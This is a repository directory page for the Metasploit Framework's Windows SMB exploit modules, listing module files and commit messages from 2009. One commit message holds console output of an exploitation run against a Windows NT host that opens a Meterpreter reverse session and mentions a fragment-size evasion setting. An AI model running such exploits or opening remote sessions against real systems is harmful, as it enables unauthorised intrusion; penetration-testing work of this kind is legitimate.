adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
07cfae0f14401e13b59caee2e417dffeda9e012a
metasploit-gs/modules/exploits/windows/smb
T
History
HD Moore aa09862813 Fixes #401. Ends up Windows NT doesn't like DCERPC requests to be partially written by SMB writes, this patches the min write size to be at least as big as the DCERPC request. The DCERPC::max_frag_size parameter can still be used for more evasion. 
[*] Started reverse handler
[*] Detected a Windows NT 4.0 target
[*] Adjusting the SMB/DCERPC parameters for Windows NT
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.0.128[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.0.128[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.0.136:4444 -> 192.168.0.128:1485)

meterpreter > sysinfo
Computer: VMNT4
OS      : Windows NT 4.0 (Build 1381, Service Pack 6).
Arch    : x86
Language: en_US



git-svn-id: file:///home/svn/framework3/trunk@7296 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-28 16:37:18 +00:00
..
ms03_049_netapi.rb
OSVDB references updates from Steve Tornio
2009-07-16 16:02:24 +00:00
ms04_007_killbill.rb
Another large number of warnings fixed by Yoann Guillot
2009-10-25 17:18:23 +00:00
ms04_011_lsass.rb
Remove the milw0rm references, as the links are no longer valid.
2009-10-24 18:13:07 +00:00
ms04_031_netdde.rb
Massive OSVDB reference update from Steve Tornio.
2009-06-07 20:20:42 +00:00
ms05_039_pnp.rb
Remove the milw0rm references, as the links are no longer valid.
2009-10-24 18:13:07 +00:00
ms06_025_rasmans_reg.rb
OSVDB references updates from Steve Tornio
2009-07-16 16:02:24 +00:00
ms06_025_rras.rb
Massive OSVDB reference update from Steve Tornio.
2009-06-07 20:20:42 +00:00
ms06_040_netapi.rb
Fixes #401. Ends up Windows NT doesn't like DCERPC requests to be partially written by SMB writes, this patches the min write size to be at least as big as the DCERPC request. The DCERPC::max_frag_size parameter can still be used for more evasion.
2009-10-28 16:37:18 +00:00
ms06_066_nwapi.rb
OSVDB references updates from Steve Tornio
2009-07-16 16:02:24 +00:00
ms06_066_nwwks.rb
OSVDB references updates from Steve Tornio
2009-07-16 16:02:24 +00:00
ms08_067_netapi.rb
Let the XP SP0/SP1 and 2000 targets automatically run
2009-07-22 12:59:08 +00:00
msdns_zonename.rb
Massive OSVDB reference update from Steve Tornio.
2009-06-07 20:20:42 +00:00
netidentity_xtierrpcpipe.rb
Another mega-patch from Yoann Guillot: fixes warnings generated by method calls with a space betwee the method and the parans, corrects a problem with the alpha encoders that causes them to overwrite the allowed charset, hardcodes the metasm output size of some modules in order to reduce load time, more to come
2009-10-25 16:40:19 +00:00
psexec.rb
Fix the Payload->Space to match the new max size limit for the EXE generator. Thanks for catching it MC
2009-09-09 21:23:11 +00:00
smb2_negotiate_func_index.rb
Remove from the db_autopwn set for now
2009-10-18 09:31:17 +00:00
smb_relay.rb
Another large number of warnings fixed by Yoann Guillot
2009-10-25 17:18:23 +00:00